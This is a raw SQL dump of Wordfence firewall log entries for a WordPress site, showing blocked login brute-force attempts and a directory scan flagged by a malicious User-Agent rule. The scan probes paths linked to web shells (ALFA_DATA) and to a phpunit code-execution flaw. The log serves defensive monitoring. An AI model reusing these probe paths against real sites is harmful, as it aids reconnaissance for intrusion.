AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15283,1704879884.281727,1704879884.215800,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15284,1704879882.853776,1704879882.772700,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15285,1704879879.940124,1704879879.862500,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15286,1704879878.018651,1704879877.957100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15287,1704879876.632747,1704879876.554900,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15288,1704879874.816704,1704879874.756700,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/Admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15289,1704879872.863162,1704879872.787000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15338,0.000000,1704895985.274852,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15339,0.000000,1704895985.192680,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15290,1704879870.393367,1704879870.269600,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/upload/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15332,0.000000,1704895059.121790,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15330,1704894591.623829,1704894591.519300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15331,1704894591.611337,1704894591.518100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15337,0.000000,1704895650.406552,'\0\0\0\0\0\0\0\0\0\0٪',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15291,1704879868.494271,1704879868.394100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15333,0.000000,1704895059.086219,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15334,0.000000,1704895151.549317,'\0\0\0\0\0\0\0\0\0\0B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15335,1704895523.716471,1704895523.613000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15336,1704895523.695521,1704895523.613300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15292,1704879860.258888,1704879860.207900,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15329,1704894326.019468,1704894325.904700,'\0\0\0\0\0\0\0\0\0\03ޞ',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15293,1704879857.150808,1704879857.069800,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15325,0.000000,1704893797.040275,'\0\0\0\0\0\0\0\0\0\0\\̊',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15326,0.000000,1704894131.301867,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15327,0.000000,1704894131.300625,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15328,0.000000,1704894198.997143,'\0\0\0\0\0\0\0\0\0\0z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15294,1704879855.498601,1704879855.434400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15321,0.000000,1704893221.575763,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15322,0.000000,1704893221.628420,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15323,1704893678.584143,1704893678.469700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15324,1704893678.582089,1704893678.470700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15295,1704879846.271786,1704879846.211100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15316,0.000000,1704892328.351358,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15317,0.000000,1704892328.350632,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15318,0.000000,1704892453.658669,'\0\0\0\0\0\0\0\0\0\0^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15319,1704892760.275594,1704892760.190900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15320,1704892760.273564,1704892760.185100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15296,1704879842.212936,1704879842.125500,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-content/mu-plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15313,0.000000,1704891598.325033,'\0\0\0\0\0\0\0\0\0\0-=s',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15314,0.000000,1704891650.420006,'\0\0\0\0\0\0\0\0\0\0v',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15315,0.000000,1704892161.394703,'\0\0\0\0\0\0\0\0\0\0D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15297,1704879841.077644,1704879840.997300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/classic/inc/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15309,0.000000,1704887983.476911,'\0\0\0\0\0\0\0\0\0\0҄!',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15310,0.000000,1704888805.213204,'\0\0\0\0\0\0\0\0\0\0q+',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15311,0.000000,1704889506.605240,' A9\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15312,0.000000,1704890829.197595,'*\0\0\0\0\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15298,1704879838.407429,1704879838.337400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-content/mu-plugins-old/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(15306,0.000000,1704884839.358719,'\0\0\0\0\0\0\0\0\0\0=&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15307,0.000000,1704886157.971256,'\0\0\0\0\0\0\0\0\0\0n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15308,0.000000,1704887475.662794,'*\0\0\0\0\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15299,1704879826.206851,1704879826.124800,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 